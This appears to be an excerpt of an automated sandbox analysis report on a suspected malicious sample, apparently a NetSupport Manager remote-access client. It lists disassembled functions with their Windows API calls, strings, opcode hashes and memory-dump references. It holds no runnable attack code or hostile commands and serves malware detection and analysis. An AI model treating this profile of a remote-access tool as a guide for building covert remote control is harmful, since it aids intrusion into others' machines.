                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Window$Class_memset$CreateDestroyInfoRectRegister
                                                                                      • String ID: NSMChatSizeWnd
                                                                                      • API String ID: 2883038198-4119039562
                                                                                      • Opcode ID: 87aebd6e18ee9abdefb850bcd11d4769ee8e47b38e4dbf48374c28c167509a6c
                                                                                      • Instruction ID: df00defde950c6a972f57fa33671139d82de9fa74eae4c6bde258e6239c9b3d1
                                                                                      • Opcode Fuzzy Hash: 87aebd6e18ee9abdefb850bcd11d4769ee8e47b38e4dbf48374c28c167509a6c
                                                                                      • Instruction Fuzzy Hash: C7314DB5D0021DAFDB10DFA5DD84BEEF7B8EB44628F20012EE925B7240D735A905CB64
                                                                                      Function 1103D160 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 98synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 1103D18F
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000125), ref: 1103D1BD
                                                                                      • CloseHandle.KERNEL32(?), ref: 1103D25C
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1103D26C
                                                                                      • CloseHandle.KERNEL32(?), ref: 1103D279
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$FileModuleNameObjectSingleWait_memset
                                                                                      • String ID: /247$" /a$RunAnnot
                                                                                      • API String ID: 2581068044-4059077130
                                                                                      • Opcode ID: b839e70076fc368ba000d97afe45d019281ed31407febcd3e3d047b5c4491ca4
                                                                                      • Instruction ID: dc76f3c11fb5ad4c0452055a60ef983052eda761819ccc7684b04031b26646f7
                                                                                      • Opcode Fuzzy Hash: b839e70076fc368ba000d97afe45d019281ed31407febcd3e3d047b5c4491ca4
                                                                                      • Instruction Fuzzy Hash: 4541C030A04319AFEB11DFA4CC84FDDB7B9EB48704F1080A5E6589B284DB71E944CF90
                                                                                      Function 1100D390 Relevance: 13.6, APIs: 9, Instructions: 75libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(00000000,11195920), ref: 1100D3A4
                                                                                      • GetProcAddress.KERNEL32(00000000,11195910), ref: 1100D3B8
                                                                                      • GetProcAddress.KERNEL32(00000000,11195900), ref: 1100D3CD
                                                                                      • GetProcAddress.KERNEL32(00000000,111958F0), ref: 1100D3E1
                                                                                      • GetProcAddress.KERNEL32(00000000,111958E4), ref: 1100D3F5
                                                                                      • GetProcAddress.KERNEL32(00000000,111958C4), ref: 1100D40A
                                                                                      • GetProcAddress.KERNEL32(00000000,111958A4), ref: 1100D41E
                                                                                      • GetProcAddress.KERNEL32(00000000,11195894), ref: 1100D432
                                                                                      • GetProcAddress.KERNEL32(00000000,11195884), ref: 1100D447
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc
                                                                                      • String ID:
                                                                                      • API String ID: 190572456-0
                                                                                      • Opcode ID: 091c258913195d468f5e27a1e6f31e310fab824e6ee381838cf7674ab6c2accf
                                                                                      • Instruction ID: 496fda0e4c6754f74ae7accc981fa1b683a1531f66a76574b420f2493807621a
                                                                                      • Opcode Fuzzy Hash: 091c258913195d468f5e27a1e6f31e310fab824e6ee381838cf7674ab6c2accf
                                                                                      • Instruction Fuzzy Hash: BC318A719222349FE756CBE5CCD5B7AFFE9A748B19B00417AD42083248E7B46840CF90
                                                                                      Function 11113150 Relevance: 13.6, APIs: 9, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetStockObject.GDI32(00000007), ref: 11113167
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 11113176
                                                                                      • SetBrushOrgEx.GDI32(?,00000000,00000000,00000000,?,11119DB4,?,00000001,00000001,00000000,1111E6D7,00000000,?,00000000), ref: 11113181
                                                                                      • GetStockObject.GDI32(00000000), ref: 11113189
                                                                                      • SelectObject.GDI32(?,00000000), ref: 11113192
                                                                                      • GetStockObject.GDI32(0000000D), ref: 11113196
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 1111319F
                                                                                      • SelectClipRgn.GDI32(00000000,00000000), ref: 111131B3
                                                                                      • SelectClipRgn.GDI32(?,?), ref: 111131D5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Object$Select$Stock$Clip$Brush
                                                                                      • String ID:
                                                                                      • API String ID: 2690518013-0
                                                                                      • Opcode ID: 03940d1c13920ebdd2799aeba9173fb3b73a5c49d6e66c97bce195a3b1bf9d70
                                                                                      • Instruction ID: 6254f714a47a8412abfa64db40702d153c74c152478294c48941108971bda100
                                                                                      • Opcode Fuzzy Hash: 03940d1c13920ebdd2799aeba9173fb3b73a5c49d6e66c97bce195a3b1bf9d70
                                                                                      • Instruction Fuzzy Hash: CC114C71604214AFE320EFA9CC88F56F7E8AF48714F114529E698DB294C774E840CF60
                                                                                      Function 11027030 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 122windowsleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11027053
                                                                                      • TranslateMessage.USER32(?), ref: 11027081
                                                                                      • DispatchMessageA.USER32(?), ref: 1102708B
                                                                                      • Sleep.KERNEL32(000003E8), ref: 11027114
                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1102717A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$DispatchSleepTranslate
                                                                                      • String ID: Bridge$BridgeThread::Attempting to open bridge...
                                                                                      • API String ID: 3237117195-3850961587
                                                                                      • Opcode ID: 0527f6f062edf77291c750114b7d9886b355368a75c305f9b203373b5eaba6dc
                                                                                      • Instruction ID: 926780c6f4d8c8949c1ee256bdfa0d08ed5449f0693c43c0c5ab50156846c558
                                                                                      • Opcode Fuzzy Hash: 0527f6f062edf77291c750114b7d9886b355368a75c305f9b203373b5eaba6dc
                                                                                      • Instruction Fuzzy Hash: AB41B475D01626DBEB15CBEDCC84EBEBBB9AB54708F900169E92593244E735E500CBA0
                                                                                      Function 110B90A0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowPlacement.USER32(00000000,0000002C,110BFEBC,?,Norm,110BFEBC), ref: 110B90E4
                                                                                      • MoveWindow.USER32(00000000,110BFEBC,110BFEBC,110BFEBC,110BFEBC,00000001,?,Norm,110BFEBC), ref: 110B9156
                                                                                      • SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B91B1
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Window$ErrorExitLastMessageMovePlacementProcessTimerwsprintf
                                                                                      • String ID: Norm$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$j CB::OnRemoteSizeNormal(%d, %d, %d, %d)$m_hWnd
                                                                                      • API String ID: 1092798621-1973987134
                                                                                      • Opcode ID: bb4fee7a640cddfa8292c04b347aeb0b9ef3b046aecc10af90a567252941b4bf
                                                                                      • Instruction ID: fa08d4082dbdb83dc84805081e5a13701295f49ac71a08f55a689e0031bf859b
                                                                                      • Opcode Fuzzy Hash: bb4fee7a640cddfa8292c04b347aeb0b9ef3b046aecc10af90a567252941b4bf
                                                                                      • Instruction Fuzzy Hash: 6A411DB5B0020AAFDB08DFA4C895EAEF7B5FF88304F104669E519A7644DB30B945CB90
                                                                                      Function 1112B340 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1112A9E0: LoadLibraryA.KERNEL32(ws2_32.dll,00000000,?), ref: 1112AA16
                                                                                        • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 1112AA33
                                                                                        • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112AA3D
                                                                                        • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,socket), ref: 1112AA4B
                                                                                        • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,closesocket), ref: 1112AA59
                                                                                        • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 1112AA67
                                                                                        • Part of subcall function 1112A9E0: FreeLibrary.KERNEL32(00000000), ref: 1112AADC
                                                                                      • LoadLibraryA.KERNEL32(ws2_32.dll,?,?,00000000), ref: 1112B38A
                                                                                      • GetProcAddress.KERNEL32(00000000,ntohl), ref: 1112B3A2
                                                                                      • _calloc.LIBCMT ref: 1112B3AD
                                                                                      • _free.LIBCMT ref: 1112B44B
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 1112B462
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$Library$FreeLoad$_calloc_free
                                                                                      • String ID: ntohl$ws2_32.dll
                                                                                      • API String ID: 2881363997-4165132517
                                                                                      • Opcode ID: a62c3fe90116abab52543d5ca7f352ed5c693b003b457ddebdd86233b9ebb92f
                                                                                      • Instruction ID: 62f3d354d7df00a53f20e52f5f0b7ab5f0e2fb1a0c0f97b8c5a029639f714dd3
                                                                                      • Opcode Fuzzy Hash: a62c3fe90116abab52543d5ca7f352ed5c693b003b457ddebdd86233b9ebb92f
                                                                                      • Instruction Fuzzy Hash: 67318D75E00229CBD7509F64CD80A9AF7B8FF48715F6081A6DC99A7200DF30AA858FD4
                                                                                      Function 1115F100 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 50COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 1115F12E
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • SystemParametersInfoA.USER32(00002000,00000000,00000001,00000000), ref: 1115F14F
                                                                                      • SystemParametersInfoA.USER32(00002001,00000000,00000000,00000000), ref: 1115F15C
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 1115F162
                                                                                      • SystemParametersInfoA.USER32(00002001,00000000,00000001,00000000), ref: 1115F177
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InfoParametersSystem$ForegroundWindow$ErrorExitLastMessageProcesswsprintf
                                                                                      • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                                      • API String ID: 3960414890-2201682149
                                                                                      • Opcode ID: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
                                                                                      • Instruction ID: 490c9e9faa58dc1df28f1acf4c3aa341e93c1bd023cf24429d0d7fa3412acb83
                                                                                      • Opcode Fuzzy Hash: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
                                                                                      • Instruction Fuzzy Hash: 8F01F276790318BBE30096A9CC86F55F398EB54B14F104126F718AA1C0DAF1B851C7E1
                                                                                      Function 11003380 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadMenuA.USER32(00000000,00002EFF), ref: 1100338E
                                                                                      • GetSubMenu.USER32(00000000,00000000), ref: 110033BA
                                                                                      • GetSubMenu.USER32(00000000,00000000), ref: 110033DC
                                                                                      • DestroyMenu.USER32(00000000), ref: 110033EA
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                      • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                      • API String ID: 468487828-934300333
                                                                                      • Opcode ID: 8af01ad4efa7446add9b372c4420e91d6a3bebcd66f8e1993f70f2b692afa4a5
                                                                                      • Instruction ID: f68e039685e14a294959d37ff9e7a7cb7630811a32528fcef7aaec2fda1b7dd6
                                                                                      • Opcode Fuzzy Hash: 8af01ad4efa7446add9b372c4420e91d6a3bebcd66f8e1993f70f2b692afa4a5
                                                                                      • Instruction Fuzzy Hash: 2FF0E93AF8466933E312A1F53C85F5BE74C9B515ECF450031F528EAA80EE54A80041AA
                                                                                      Function 11119160 Relevance: 12.2, APIs: 8, Instructions: 209COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetClientRect.USER32(?,00000000), ref: 11119200
                                                                                      • ClientToScreen.USER32(?,?), ref: 11119241
                                                                                      • GetCursorPos.USER32(?), ref: 111192A1
                                                                                      • GetTickCount.KERNEL32 ref: 111192B6
                                                                                      • GetTickCount.KERNEL32 ref: 11119337
                                                                                      • WindowFromPoint.USER32(?,?,?,?), ref: 1111939A
                                                                                      • WindowFromPoint.USER32(000000FF,?), ref: 111193AE
                                                                                      • SetCursorPos.USER32(000000FF,?,?,?), ref: 111193C2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ClientCountCursorFromPointTickWindow$RectScreen
